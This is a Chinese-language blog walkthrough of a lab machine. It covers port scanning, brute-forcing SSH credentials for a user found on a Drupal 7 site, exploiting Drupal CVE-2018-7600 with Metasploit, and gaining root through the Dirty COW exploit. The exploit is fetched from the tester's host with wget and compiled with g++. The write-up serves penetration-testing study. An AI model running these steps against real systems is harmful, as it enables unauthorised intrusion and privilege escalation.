又是一个周末,很长时间没更新了,摸下靶机记录一下
1.信息收集
开启nmap扫描一下获取目标IP
接着扫目标IP
发现开启了三个端口22,80,1898
尝试对22端口进行ssh弱口令爆破无果,再访问80端口看看
一个静态页面,通过各种工具扫描之后也是没有头绪,还剩一个1898端口
除了一个登录框还要俩页面
天真的我对登录框尝试了弱口令,无果之后陷入了僵局,直到发现url栏里这俩页面一个node/1,一个node/3说明应该还存在一个2,修改成2访问看看
看到了点有用的信息,逐个访问看看
额,略微尴尬,新机子啥也没装,瞧一眼其它师傅写的文章这里是啥
是一段语音,语音内容为:user tiago,则用户名为:tiago
一个二维码,扫了一下出现了一句英文:Try harder!Muahuahua
无用,尝试对网站进行扫描,御剑或者其它工具,这里我就用跟其它师傅一样的dirb吧
发现一个robots.txt的文件,访问看看
在此文件中找到了网站信息
是个Drupal 7的CMS
到这里之后我首先想到的就是找历史漏洞看看能不能通过MSF打一下,看了一篇文章之后发现再这之前还有一步连接ssh,历史漏洞用来进行提权
首先使用cewl结合网站特性生成社工字典,随后用hydra进行爆破
成功爆破出了密码
使用账户密码连接ssh
成功连接,先尝试看看能不能sudo su提权到root,失败了…
2.提权
这里还是不太熟悉,参考着师傅们的文章打的
还记得之前找到的Drupal 7的CMS,网上找到了CVE-2018-7600的漏洞,掏出大宝贝MSF
show option查看渗透信息,需要填写Rhosts攻击IP,Rport攻击端口
设置完之后运行成功
现在是成功利用该CVE漏洞进入系统,应该是个跟之前ssh一样的低权限用户
转入tty
python -c 'import pty; pty.spawn("/bin/bash")'
后面通过文章学习需要利用脏牛提权(dirty),本地查找一下
接着将其复制到本地,开启本地python服务,然后把40847.cpp发送到靶机上
python -m SimpleHTTPServer 5555
开启服务
接下来将40847.cpp传到靶机上
wget http://192.168.149.128:5555/40847.cpp
执行gcc编译可执行文件,可直接提权
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4. -std=c++11就是用按C++2011标准来编译的
5. -pthread 在Linux中要用到多线程时,需要链接pthread库
6. -o dcow gcc生成的目标文件,名字为dcow
提权成功拿到了root的密码
接下来使用root账户登录ssh
成功登录,查看一下目录
直接获取flag
这一次的渗透学习比刚开始好很多,没有特别的手足无措…唔~